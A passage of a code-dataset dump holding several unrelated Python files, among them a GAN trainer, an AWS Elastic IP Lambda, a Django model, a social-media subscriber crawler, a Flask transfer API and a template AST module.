[\".jpg\", \".png\"]:\n caminho = os.path.join(diretorio, arquivo)\n pagina.write(f\"

{nome}

\")\npagina.write(\"\")\npagina.close()\n","sub_path":"cap09/exercicio-09-33.py","file_name":"exercicio-09-33.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"151551106","text":"## \n# This module implements a function for executing binary searches in a list.\n#\n\n## Finds a value in a range of a sorted list, using the binary search algorithm.\n# @param values the list in which to search\n# @param low the low index of the range\n# @param high the high index of the range\n# @param target the value to find\n# @return the index at which the target occurs, or -1 if it does not occur in the list\n#\ndef binarySearch(values, low, high, target) :\n if low <= high :\n mid = (low + high) // 2\n \n if values[mid] == target :\n return mid\n elif values[mid] < target :\n return binarySearch(values, mid + 1, high, target)\n else :\n return binarySearch(values, low, mid - 1, target)\n \n else :\n return -1\n","sub_path":"P4EO_source/ch12/sec06/binarysearch.py","file_name":"binarysearch.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525160825","text":"# coding: UTF-8\nfrom __future__ import print_function\nimport argparse\nimport os\nimport datetime\nimport shutil\nimport glob\nimport re\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer.dataset import convert\nfrom chainer.dataset import iterator as iterator_module\nfrom chainer import training\nfrom chainer import reporter\nfrom chainer import cuda\nfrom chainer.training import extensions\nimport six\n\nimport numpy as np\nfrom PIL import Image\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import pylab as plt\n\n\n# Network definition\nclass discriminator(chainer.Chain):\n\n def __init__(self, n_units, n_canvas):\n super(discriminator, self).__init__(\n fc1=L.Linear(n_canvas ** 2, n_units, wscale=0.002, bias=0),\n bn1=L.BatchNormalization(n_units),\n fc2=L.Linear(n_units, n_units, wscale=0.002, bias=0),\n bn2=L.BatchNormalization(n_units),\n fc3=L.Linear(n_units, n_units, wscale=0.002, bias=0),\n bn3=L.BatchNormalization(n_units),\n fc4=L.Linear(n_units, n_units, wscale=0.002, bias=0),\n bn4=L.BatchNormalization(n_units),\n fc5=L.Linear(n_units, n_canvas ** 2, wscale=0.002, bias=0),\n )\n self.n_canvas = n_canvas\n self.n_saved = 1\n\n def __call__(self, x, train=True):\n h1 = F.leaky_relu(F.dropout(self.bn1(self.fc1(x)), train=train))\n h2 = F.leaky_relu(F.dropout(self.bn2(self.fc2(h1)), train=train))\n h3 = F.leaky_relu(F.dropout(self.bn3(self.fc3(h2)), train=train))\n h4 = F.leaky_relu(F.dropout(self.bn4(self.fc4(h3)), train=train))\n y = self.fc5(h4)\n if train:\n return y\n else:\n return cuda.to_cpu(y.data)\n\n def encode(self, x):\n h1 = F.leaky_relu(F.dropout(self.bn1(self.fc1(x)), train=False))\n h2 = F.leaky_relu(F.dropout(self.bn2(self.fc2(h1)), train=False))\n h3 = F.leaky_relu(F.dropout(self.bn3(self.fc3(h2)), train=False))\n h4 = F.leaky_relu(F.dropout(self.bn4(self.fc4(h3)), train=False))\n return h4\n\n def save_images(self, n_image, result, test):\n pic = np.zeros((n_image * self.n_canvas, n_image * self.n_canvas))\n test = chainer.Variable(test)\n images = np.squeeze(self.__call__(test, train=False))\n images = images.reshape((-1, self.n_canvas, self.n_canvas))\n for i in six.moves.range(n_image):\n for j in six.moves.range(n_image):\n pic[self.n_canvas * i:self.n_canvas * i + self.n_canvas,\n self.n_canvas * j:self.n_canvas * j + self.n_canvas] = \\\n images[i * n_image + j]\n plt.imshow(pic, vmin=-1, vmax=1, interpolation='none')\n plt.gray()\n plt.savefig('{}/encode_decode_{}.png'.format(result, self.n_saved))\n self.n_saved += 1\n\n\nclass generator(chainer.Chain):\n\n def __init__(self, n_z, n_units, n_canvas, batchsize, xp):\n super(generator, self).__init__(\n fc1=L.Linear(n_z, n_units, wscale=0.02, bias=0),\n bn1=L.BatchNormalization(n_units),\n fc2=L.Linear(n_units, n_units, wscale=0.02, bias=0),\n bn2=L.BatchNormalization(n_units),\n fc3=L.Linear(n_units, n_units, wscale=0.02, bias=0),\n bn3=L.BatchNormalization(n_units),\n fc4=L.Linear(n_units, n_units, wscale=0.02, bias=0),\n bn4=L.BatchNormalization(n_units),\n fc5=L.Linear(n_units, n_canvas ** 2, wscale=0.02, bias=0),\n )\n self.n_canvas = n_canvas\n self.batchsize = batchsize\n self.n_z = n_z\n self._xp = xp\n self.n_saved = 1\n\n def __call__(self, train=True, n_image=None):\n if train:\n z = chainer.Variable(self._xp.random.uniform(\n -1, 1, (self.batchsize, self.n_z)).astype(np.float32))\n else:\n z = chainer.Variable(self._xp.random.uniform(\n -1, 1, (n_image * n_image, self.n_z)).astype(np.float32))\n h1 = F.relu(self.bn1(self.fc1(z)))\n h2 = F.relu(self.bn2(self.fc2(h1)))\n h3 = F.relu(self.bn3(self.fc3(h2)))\n h4 = F.relu(self.bn4(self.fc4(h3)))\n y = self.fc5(h4)\n if train:\n return y\n else:\n return cuda.to_cpu(y.data)\n\n def save_images(self, n_image, result):\n pic = np.zeros((n_image * self.n_canvas, n_image * self.n_canvas))\n images = np.squeeze(self.__call__(False, n_image))\n images = images.reshape((-1, self.n_canvas, self.n_canvas))\n for i in six.moves.range(n_image):\n for j in six.moves.range(n_image):\n pic[self.n_canvas * i:self.n_canvas * i + self.n_canvas,\n self.n_canvas * j:self.n_canvas * j + self.n_canvas] = \\\n images[i * n_image + j]\n plt.imshow(pic, vmin=-1, vmax=1, interpolation='none')\n plt.gray()\n plt.savefig('{}/generated_{}.png'.format(result, self.n_saved))\n self.n_saved += 1\n\n\nclass gan_updater(training.StandardUpdater):\n\n def __init__(self, iterator, discriminator, generator,\n optimizer_d, optimizer_g, margin, pt,\n device, batchsize,\n converter=convert.concat_examples):\n if isinstance(iterator, iterator_module.Iterator):\n iterator = {'main': iterator}\n self._iterators = iterator\n self.discriminator = discriminator\n self.generator = generator\n self._optimizers = {'discriminator': optimizer_d,\n 'generator': optimizer_g}\n self.device = device\n self.loss_weight = batchsize / len(self._iterators['main'].dataset)\n self.converter = converter\n self.iteration = 0\n self.margin = margin\n self.pt = pt\n self.sum_loss_dis = 0\n self.sum_loss_gen = 0\n self.sum_pt = 0\n\n def update_core(self):\n if self._iterators['main'].is_new_epoch:\n self.sum_loss_dis = 0\n self.sum_loss_gen = 0\n self.sum_pt = 0\n\n batch = self._iterators['main'].next()\n in_arrays = self.converter(batch, self.device)\n\n in_var = chainer.Variable(in_arrays)\n generated = self.generator()\n\n y_data = self.discriminator(in_var)\n loss_dis = F.mean_squared_error(y_data, in_var)\n\n y_generated = self.discriminator(generated)\n loss_gen = F.mean_squared_error(y_generated, generated)\n loss_dis += F.relu(self.margin - loss_gen)\n\n self.sum_loss_dis += self.loss_weight * loss_dis.data\n self.sum_loss_gen += self.loss_weight * loss_gen.data\n\n if self.pt:\n s = self.discriminator.encode(generated)\n normalized_s = F.normalize(s)\n cosine_similarity = F.matmul(normalized_s, normalized_s,\n transb=True)\n pterm = cosine_similarity * cosine_similarity\n pterm = F.sum(pterm)\n pterm /= s.shape[0] * s.shape[0]\n loss_gen += 0.1 * pterm\n self.sum_pt += self.loss_weight * pterm.data\n\n reporter.report({'dis/loss': self.sum_loss_dis})\n reporter.report({'gen/loss': self.sum_loss_gen})\n reporter.report({'gen/pt': self.sum_pt})\n\n self._optimizers['discriminator'].target.cleargrads()\n loss_dis.backward()\n self._optimizers['discriminator'].update()\n\n self._optimizers['generator'].target.cleargrads()\n loss_gen.backward()\n self._optimizers['generator'].update()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='DCGAN')\n parser.add_argument('--batchsize', '-b', type=int, default=100,\n help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=500,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu', '-g', type=int, default=-1,\n help='GPU ID (negative value indicates CPU)')\n parser.add_argument('--resume', '-r', default='',\n help='Resume the training from snapshot')\n parser.add_argument('--unitd', '-ud', type=int, default=1024,\n help='Number of units of discriminator')\n parser.add_argument('--unitg', '-ug', type=int, default=3200,\n help='Number of units of generator')\n parser.add_argument('--canvas', '-c', type=int, default=28,\n help='Size of canvas')\n parser.add_argument('--dimension', '-d', type=int, default=3,\n help='Dimension of rand')\n parser.add_argument('--image', '-i', type=int, default=5,\n help='Number of output images')\n parser.add_argument('--margin', '-m', type=int, default=10,\n help='Margin of loss function')\n parser.add_argument('--pt', '-p', type=int, default=1,\n help='Use of pull-away term')\n args = parser.parse_args()\n xp = cuda.cupy if args.gpu >= 0 else np\n\n result = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n os.mkdir(result)\n shutil.copy(__file__, result + '/' + __file__)\n\n print('GPU: {}'.format(args.gpu))\n print('# Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('')\n\n # Set up a neural network to train\n dis = discriminator(args.unitd, args.canvas)\n gen = generator(args.dimension, args.unitg, args.canvas,\n args.batchsize, xp)\n if args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current\n dis.to_gpu() # Copy the model to the GPU\n gen.to_gpu() # Copy the model to the GPU\n\n # Setup optimizers\n optimizers = {'dis': chainer.optimizers.Adam(alpha=1e-3, beta1=0.5),\n 'gen': chainer.optimizers.Adam(alpha=1e-3, beta1=0.5)}\n optimizers['dis'].setup(dis)\n optimizers['gen'].setup(gen)\n\n # Load the MNIST dataset\n train, test = chainer.datasets.get_mnist(False, 1)\n train *= 2\n train -= 1\n test *= 2\n test -= 1\n test = xp.asarray(test[:args.image * args.image])\n data_iter = chainer.iterators.SerialIterator(train, args.batchsize)\n\n updater = gan_updater(data_iter, dis, gen,\n optimizers['dis'], optimizers['gen'], args.margin,\n args.pt, args.gpu, args.batchsize)\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=result)\n\n # trainer.extend(extensions.dump_graph('dis/loss'))\n # trainer.extend(extensions.dump_graph('gen/loss'))\n # trainer.extend(extensions.dump_graph('gen/pt'))\n\n # Take a snapshot at each epoch\n trainer.extend(extensions.snapshot(), trigger=(args.epoch, 'epoch'))\n\n # Write a log of evaluation statistics for each epoch\n trainer.extend(extensions.LogReport())\n\n trainer.extend(extensions.PrintReport(\n ['epoch', 'dis/loss', 'gen/loss', 'gen/pt']))\n\n @training.make_extension(trigger=(1, 'epoch'))\n def generate_images(trainer):\n gen.save_images(args.image, result)\n\n @training.make_extension(trigger=(1, 'epoch'))\n def encode_decode_images(trainer):\n dis.save_images(args.image, result, test)\n\n trainer.extend(generate_images)\n trainer.extend(encode_decode_images)\n # Print a progress bar to stdout\n trainer.extend(extensions.ProgressBar())\n\n if args.resume:\n # Resume from a snapshot\n chainer.serializers.load_npz(args.resume, trainer)\n\n # Run the training\n trainer.run()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ebgan_mnist.py","file_name":"ebgan_mnist.py","file_ext":"py","file_size_in_byte":11598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651275669","text":"import re\nimport os\n\n\ndef checkpath(path):\n if not os.path.isdir(path):\n return False\n else:\n return True\n\n\ndef checkfilename(files):\n filenames = files.split(\",\")\n errors = []\n pattern_full = r\"\\w*\\.\\w\\w\\w\"\n pattern_after_dot = re.compile(\"\\.\\w\\w\\w$\")\n pattern_before_dot = re.compile('^\\w*')\n for file in filenames:\n if re.match(pattern_full, file) is None:\n errors.append(file)\n if len(errors) != 0:\n #print(\"You have {} mistakes in your filenames: \".format(len(errors)))\n #print(\",\".join(\"{}\".format(error) for error in errors))\n return errors\n else:\n return \"0\"","sub_path":"checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"542535674","text":"import attr\n\n\n@attr.s\nclass SourceFile:\n name: str = attr.ib()\n text: str = attr.ib(repr=False)\n\n @classmethod\n def load(cls, name: str):\n with open(name) as fp:\n text = fp.read()\n return cls(\n name=name,\n text=text,\n )\n\n\n@attr.s\nclass Location:\n source: SourceFile = attr.ib()\n pos: int = attr.ib()\n\n\nclass LocationError(RuntimeError):\n def __init__(self, loc: Location, message: str) -> None:\n self.loc = loc\n self.message = message\n super().__init__(loc, message)\n\n\ndef error_at(loc: Location, message: str) -> str:\n try:\n start = loc.source.text.rindex(\"\\n\", 0, loc.pos) + 1\n except ValueError:\n start = 0\n try:\n end = loc.source.text.index(\"\\n\", loc.pos)\n except ValueError:\n end = len(loc.source.text)\n\n print(loc, start, end, loc.pos - start)\n line = loc.source.text[start:end]\n s = line + \"\\n\"\n s += \" \" * (loc.pos - start)\n s += \"^ \" + message\n return s\n","sub_path":"pycc/loc.py","file_name":"loc.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"488712823","text":"import boto3\n\nclass Assign2EIP:\n def __init__(self, instance):\n self.instance_id = instance\n self.ec2 = boto3.client('ec2')\n self.ec2R = boto3.resource('ec2')\n self.ssm = boto3.client('ssm')\n self.eni, self.attachment_id = self.get_eni()\n self.assign_private_ip()\n self.eip_dict = self.generate_2_eip()\n self.private_ips = self.fetch_private_ips()\n self.associate_eip_private_ip()\n\n def get_eni(self):\n eni = self.ec2R.Instance(self.instance_id)\n return (eni.network_interfaces_attribute[0]['NetworkInterfaceId'],eni.network_interfaces_attribute[0]['Attachment']['AttachmentId'])\n\n\n def assign_private_ip(self):\n result = self.ec2.assign_private_ip_addresses(NetworkInterfaceId=self.eni, SecondaryPrivateIpAddressCount=1)\n return result['AssignedPrivateIpAddresses'][0]['PrivateIpAddress']\n\n def generate_2_eip(self):\n data = self.ec2.describe_addresses()\n counter = []\n eip_dictionary = {}\n \n if len(data['Addresses']) == 0:\n for execute in range(2):\n data = self.ec2.allocate_address(Domain='vpc')\n public_ip = data['PublicIp']\n allocation_id = data['AllocationId']\n eip_dictionary[public_ip] = allocation_id\n return eip_dictionary\n\n if len(data['Addresses']) < 2:\n for i in data['Addresses']:\n if 'InstanceId' not in i.keys():\n counter.append(i)\n if len(counter) < 2:\n for execute in range(1):\n data = self.ec2.allocate_address(Domain='vpc')\n updated_data = self.ec2.describe_addresses()['Addresses']\n return {eip['PublicIp']: eip['AllocationId'] for eip in updated_data}\n\n\n else:\n data = self.ec2.describe_addresses()['Addresses']\n return {eip['PublicIp']:eip['AllocationId'] for eip in data}\n\n def associate_eip_private_ip(self):\n allocation_ids = [ai for ai in self.eip_dict.values()]\n for index, pip in enumerate(self.private_ips):\n print(allocation_ids[index], pip)\n self.ec2.associate_address(\n AllocationId=allocation_ids[index],\n InstanceId=self.instance_id,\n PrivateIpAddress=pip)\n\n\n def fetch_private_ips(self):\n data = self.ec2.describe_network_interfaces(NetworkInterfaceIds=[self.eni])\n return [pip['PrivateIpAddress'] for pip in data['NetworkInterfaces'][0]['PrivateIpAddresses']]\n\n\ndef lambda_handler(event,context):\n instance_id = event['detail']['instance-id']\n go = Assign2EIP(instance_id)\n","sub_path":"assign_2_eip_eni.py","file_name":"assign_2_eip_eni.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"597309306","text":"from django.db import models\nimport json\n\n# Create your models here.\nclass Question(models.Model):\n\t# Campo de texto de size maximo 200\n\tquestion_text = models.CharField(max_length=200)\n\t# Campo de fecha y hora\n\tpub_date = models.DateTimeField('date published')\n\t# Icono\n\ticon = models.CharField(max_length = 50)\n\n\tdef __str__(self):\n\t\treturn self.question_text.encode(\"utf-8\")\n\n\tdef toDict(self):\n\t\tvotesList = []\n\n\t\tfor c in self.choice_set.all():\n\t\t\tvotesList.append({\n\t\t\t\t\"id\": c.pk,\n\t\t\t\t\"name\": c.choice_text.encode(\"utf-8\"),\n\t\t\t\t\"votes\": c.votes\n\t\t\t})\n\n\t\treturn {\n\t\t\t'id': self.id,\n\t\t\t\"name\": self.question_text.encode(\"utf-8\"),\n\t\t\t\"icon\": self.icon,\n\t\t\t\"pub_date\": self.pub_date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\"options\": votesList\n\t\t}\n\n\tdef toJSON(self):\n\t\treturn json.dumps(self.toDict())\n\nclass Choice(models.Model):\n\t# El campo es una clave foranea de Question\n\tquestion = models.ForeignKey(Question)\n\tchoice_text = models.CharField(max_length=200)\n\tvotes = models.IntegerField(default=0)\n\n\tdef __str__(self):\n\t\treturn self.choice_text.encode(\"utf-8\") + \"\\t{\" + str(self.votes) + \"}\"","sub_path":"mysite/polls/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"451945493","text":"#\n# @lc app=leetcode id=7 lang=python3\n#\n# [7] Reverse Integer\n#\n\n# @lc code=start\nclass Solution:\n def reverse(self, x: int) -> int:\n res, ispos = 0, 1\n if(x < 0):\n ispos = -1\n x *= -1\n while(x!=0):\n res = res * 10 + x%10\n if(res > 2147483647):\n return 0\n x = int(x / 10)\n return res*ispos\n# @lc code=end\n\n","sub_path":"heregreat/python/7.reverse-integer.py","file_name":"7.reverse-integer.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365806150","text":"import csv\nfrom DAMM_model import damm_flx\nfrom supeca import supmic_flx\nfrom su_model import su_flx\nimport numpy as np\n\nk2f=10. #number of C atmos per substrate molecule\n#set up model parameters\nDZ=0.1 #topsoil thickness, 10 cm\nalphaV=80.0 #volume a cell occupies\nmb=2. #mol of microbial C\nNcello=10.0 #number of cells per microsite, this is for oxygen\nfrom Kaffapp import set_micpara\nset_micpara(1.e2)\n\nfrom Kaffapp import rc, calc_Kaff_soil, calc_Kaff_O2, calc_cell_permolC, calc_Kaff_SC,calc_Kaff_ch4\nfrom supeca import supeca_model\n#number of cells per mol carbon\ncell_molC=calc_cell_permolC(rc)\nBT=mb*cell_molC #total number of cells, in mol /m3\n\nO2=8.57 # mol /m3\nS=0.3 #mol/m3 ~ 3.6 mg/L\n\nk=0\ndammfls=[]\nsufls=[]\nsupfls=[]\ndf=3.\n\no2scal=1.\npct_sand=20.\npct_clay=[10.,20.,40.,70.]\nkt=len(pct_clay)\nk=0\n\nwhile k < kt:\n s_sat, theta, epsi, taug, tauw, film,psi,chb=calc_Kaff_soil(pct_clay[k], pct_sand)\n factw=s_sat**(1./df)\n Kaff_o2g_full,Kaff_o2g,k2,k1_o2,k1_o2_full,kappa_tops=calc_Kaff_O2(s_sat, theta, epsi, taug, tauw, film, DZ, Ncello, BT, alphaV,factw)\n Kaff_o2g_full=Kaff_o2g_full*o2scal\n k1_o2_full=k1_o2_full/o2scal\n\n Ncell=10\n k1_s,Kaff_s,Kaff_s_0=calc_Kaff_SC(s_sat, theta, epsi, taug, tauw, film, DZ, Ncell, alphaV)\n #damm model\n k2=k2*k2f\n Vmax=BT*k2\n dammf=damm_flx(O2,S,factw,Kaff_s*1.e0,Kaff_o2g,kappa_tops,Vmax)\n damfmax=np.max(dammf)\n dammf=dammf/damfmax\n #su model\n suf=su_flx(O2,S, factw,BT, k2*1.e0, k1_o2, k1_s,kappa_tops)\n sufmax=np.max(suf)\n suf=suf/sufmax\n #supeca model\n ms=0.0\n Km_s=2.0\n supf=supmic_flx(O2,S,factw, BT, ms, Km_s, Kaff_o2g, Kaff_s, kappa_tops, k2)\n supfmax=np.max(supf)\n supf=supf/supfmax\n dammfls.append(dammf)\n sufls.append(suf)\n supfls.append(supf)\n k=k+1\n\nplt_to_file=True\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nif plt_to_file:\n pdf=PdfPages('figure/Figure6.pdf')\n fig=plt.figure()\nfont = {'family': 'serif',\n 'color': 'black',\n 'weight': 'normal',\n 'size': 12,\n }\n\n#plt.rcParams[\"figure.figsize\"] = (11,4)\nplt.subplot(221)\nplt.plot(s_sat,np.transpose(dammfls))\nplt.yticks(np.arange(0, 1.2, step=0.25),[0.0,'',0.5,'',1.0])\nplt.text(0.05, 0.9, '(a) DM',fontdict=font)\nplt.xticks(np.arange(0, 1.2, step=0.2),[])\nplt.subplot(222)\nplt.plot(s_sat,np.transpose(sufls))\nplt.yticks(np.arange(0, 1.2, step=0.25),[])\nplt.text(0.05, 0.9, '(b) SU',fontdict=font)\nplt.xlabel('Relative saturation',fontdict=font)\nplt.subplot(223)\nfor n in range(4):\n plt.plot(s_sat,np.transpose(supfls[n][:]),label=\"clay=%d%s\"%(pct_clay[n],'%',))\nplt.yticks(np.arange(0, 1.2, step=0.25),[])\nplt.yticks(np.arange(0, 1.2, step=0.25),[0.0,'',0.5,'',1.0])\nplt.text(0.05, 0.9, '(c) SUPECA',fontdict=font)\nplt.xlabel('Relative saturation',fontdict=font)\nplt.legend(loc=9, bbox_to_anchor=(1.7, 0.6))\nplt.subplots_adjust(top=0.9, bottom=0.12, left=0.10, right=0.95, hspace=0.1,\n wspace=0.15)\nplt.text(0.15, 0.915, 'Clay content effect on moisture-respiration relationship',fontdict=font,transform=plt.gcf().transFigure)\n\nplt.text(0.015, 0.75, 'Normalized respiration',fontdict=font,transform=plt.gcf().transFigure, rotation=90)\nif plt_to_file:\n pdf.savefig(fig)\n pdf.close()\nelse:\n plt.show()\n","sub_path":"clay_hr_sens_moisture.py","file_name":"clay_hr_sens_moisture.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519316747","text":"import logging\nimport time\n\nfrom crawlers.twitter.tw import Tw\nfrom crawlers.vkontakte.vk import Vk\nfrom crawlers.instagram.insta import Insta\nfrom monitor_api.api import MonitorApi\nfrom utils.json_helper import read_json_from_file, write_json_to_file, dump\n\nconfig = read_json_from_file('resources/config.json')\nlogging.basicConfig(level='INFO')\n\n\ndef get_crawler(type_social):\n if type_social == 'IN':\n return insta\n if type_social == 'VK':\n return vk\n if type_social == 'TW':\n return tw\n\n\ndef update_sources():\n sources = monitor.get_sources()\n write_json_to_file('sources_from_monitor.json', dump(sources))\n\n count = 0\n for source in sources:\n count += 1\n\n internal_id = source['internal_id']\n source_id = source['id']\n link = source['link']\n name = source['name']\n avatar = source['avatar']\n type_social = source['type_social']\n crawler = get_crawler(type_social)\n logging.info(f'{count}. Получаем информацию для {link}')\n if not internal_id:\n internal_id = crawler.get_internal_id(link)\n subscribers = crawler.get_subscribers_count(internal_id=int(internal_id), link=link)\n subscribers.update({'source': source_id})\n monitor.add_subscribers(dump(subscribers))\n info = crawler.get_info(internal_id=int(internal_id), link=link)\n if link == info['link'] and name == info['name'] and avatar == info['avatar']:\n logging.info(f'Ничего нового')\n continue\n if link != info['link']:\n logging.info('Обновлена ссылка')\n if name != info['name']:\n logging.info('Обновлено имя')\n if avatar != info['avatar']:\n logging.info('Обновлен аватар')\n info.update({'id': source_id})\n monitor.update_source(dump(info), source_id)\n\n\ndef get_subscribers():\n sources = monitor.get_sources()\n write_json_to_file('sources_from_monitor.json', dump(sources))\n\n count = 0\n for source in sources:\n count += 1\n internal_id = source['internal_id']\n source_id = source['id']\n link = source['link']\n type_social = source['type_social']\n crawler = get_crawler(type_social)\n logging.info(f'{count}. Получаем количество подписчиков для {link}')\n if not internal_id:\n internal_id = crawler.get_internal_id(link)\n subscribers = crawler.get_subscribers_count(internal_id=int(internal_id), link=link)\n subscribers.update({'source': source_id})\n monitor.add_subscribers(dump(subscribers))\n\n\nif __name__ == '__main__':\n monitor = MonitorApi()\n vk = Vk(config['vk_login'], config['vk_password'])\n insta = Insta()\n tw = Tw()\n\n while True:\n update_sources()\n get_subscribers()\n logging.info('Ждём час')\n time.sleep(3600)\n","sub_path":"start_subscribers_crawler.py","file_name":"start_subscribers_crawler.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"128403625","text":"from flask import Flask, request, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\nCOSTO_TRANSFERENCIA = 0.3\r\n\r\ncuentas = [\r\n {\r\n 'numero': '3333',\r\n 'cliente': 'Fulano Detal',\r\n 'saldo': 20.5\r\n },\r\n {\r\n 'numero': '4444',\r\n 'cliente': 'Aquiles Bailo',\r\n 'saldo': 1234.25\r\n },\r\n]\r\n\r\n@app.route('/transferir', methods=['POST'])\r\ndef transferencia():\r\n data = request.json\r\n cuenta_origen = data['cuenta_origen']\r\n if cuenta_origen != None and cuenta_origen != '':\r\n for cuenta in cuentas:\r\n if cuenta['numero'] == cuenta_origen:\r\n\r\n print(f\"Esta es la cuenta del cliente: {cuenta['cliente']}\")\r\n saldo = cuenta['saldo']\r\n monto = data['monto_transferencia']\r\n\r\n if saldo >= monto + COSTO_TRANSFERENCIA:\r\n cuenta['saldo'] = saldo - (monto + COSTO_TRANSFERENCIA)\r\n print(f\"Se va a transferir: {monto}\")\r\n return jsonify({\r\n 'entidad_fincaciera': data['entidad_fincaciera'],\r\n 'cuenta_destino': data['cuenta_destino'],\r\n 'monto_transferencia':monto,\r\n 'descripcion': data['descripcion'],\r\n })\r\n\r\n else:\r\n\r\n return jsonify({'error':'No dispone del saldo suficiente para realizar la transaccion.'})\r\n\r\n \r\n return jsonify({'error':'La cuenta solicitada no existe'})\r\n \r\n else :\r\n return jsonify({'error':'No se proporciono un numero de cuenta valido.'})\r\n\r\n@app.route('/acreditar_transferencia')\r\ndef acreditar_transferencia():\r\n data = request.json\r\n cuenta_destino = data['cuenta_destino']\r\n if cuenta_destino != None and cuenta_destino != '':\r\n for cuenta in cuentas:\r\n if cuenta['numero'] == cuenta_destino:\r\n monto = data['monto_transferencia']\r\n saldo = cuenta['saldo']\r\n cuenta['saldo'] += monto\r\n return jsonify({\r\n \"estado_transferencia\":\"Completada\",\r\n \"cuenta_destino\": cuenta_destino,\r\n \"cliente\": cuenta['cliente'],\r\n \"monto_transferencia\":monto,\r\n \"saldo_antes\":saldo,\r\n \"saldo_despues\": cuenta['saldo'],\r\n })\r\n\r\n return jsonify({'error':'La cuenta solicitada no existe'})\r\n\r\n else :\r\n return jsonify({'error':'No se proporciono un numero de cuenta valido.'})\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, port=3200)","sub_path":"jep.py","file_name":"jep.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"270658226","text":"#!/usr/bin/python2.7\n# Copyright 2012 JatLeGo Inc. All Rights Reserved.\n# Author: andyzh1314@gmail.com (Andy Zhau)\n#\n# The abstract syntax tree of the JTML element.\n\n\nclass JtmlAstElement(object):\n\n\n def __init__(self, spaces=\"\"):\n self.spaces = spaces\n\n\nclass String(JtmlAstElement):\n\n\n def __init__(self, items, spaces=\"\"):\n \"\"\" items could be a single string for triple-quote-string, or a list of\n element for normal string.\n\n \"\"\"\n if not isinstance(items, basestring):\n for item in items:\n assert isinstance(item, (JtmlAstElement, basestring))\n self.items = items\n super(String, self).__init__(spaces=spaces)\n\n def __str__(self):\n if isinstance(self.items, basestring):\n return '\"\"\"%s\"\"\"' % self.items + self.spaces\n return '\"%s\"' % (\"\".join(str(item) for item in self.items)) + self.spaces\n\n\nclass Variable(JtmlAstElement):\n\n\n def __init__(self, name, spaces=\"\"):\n assert isinstance(name, basestring)\n self.name = name\n super(Variable, self).__init__(spaces=spaces)\n\n def __str__(self):\n return \"{%s}\" % self.name\n\n\nclass Tag(JtmlAstElement):\n\n\n def __init__(self, name, id, classes, attributes, content, spaces=\"\"):\n assert isinstance(name, basestring)\n if id is not None:\n assert isinstance(id, (basestring, String, Variable, Function))\n if classes is not None:\n for cls in classes:\n assert isinstance(cls, (basestring, String, Variable, Function))\n if attributes is not None:\n for attr in attributes: assert isinstance(attr, Attribute)\n if content is not None:\n assert isinstance(content, StatementList)\n self.name = name\n self.id = id\n self.classes = classes\n self.attributes = attributes\n self.content = content\n super(Tag, self).__init__(spaces=spaces)\n\n def __str__(self):\n ret = self.name\n if self.id: ret += \"#%s\" % str(self.id)\n for cls in self.classes:\n ret += \".%s\" % str(cls)\n if self.attributes:\n ret += \"[\"\n for index, attr in enumerate(self.attributes):\n if index: ret += \",\"\n ret += str(attr)\n ret += \"]\"\n if self.content:\n ret += \"<%s>\" % str(self.content)\n return ret + self.spaces\n\n\nclass Function(JtmlAstElement):\n\n\n def __init__(self, name, args, spaces=\"\"):\n assert isinstance(name, basestring)\n if args is not None:\n for arg in args:\n assert isinstance(arg, StatementList)\n self.name = name\n self.args = args or []\n super(Function, self).__init__(spaces=spaces)\n\n def __str__(self):\n return \"(%s,%s)\" % (self.name, \",\".join(str(arg) for arg in self.args))\n\n\nclass Attribute(JtmlAstElement):\n\n\n def __init__(self, name, value, condition=None, spaces=\"\"):\n assert isinstance(name, (basestring, String, Variable, Function))\n assert isinstance(value, (basestring, String, Variable, Function))\n if condition is not None:\n assert isinstance(condition, (Variable, Function))\n self.name = name\n self.value = value\n self.condition = condition\n super(Attribute, self).__init__(spaces=spaces)\n\n def __str__(self):\n if self.condition is None:\n return \"%s=%s\" % (str(self.name), str(self.value))\n return \"%s?%s:%s\" % (str(self.name), str(self.condition), str(self.value))\n\n\nclass StatementList(JtmlAstElement):\n\n\n def __init__(self, spaces=\"\"):\n self.statements = []\n super(StatementList, self).__init__(spaces=spaces)\n\n def AddStatement(self, statement, spaces=\"\"):\n 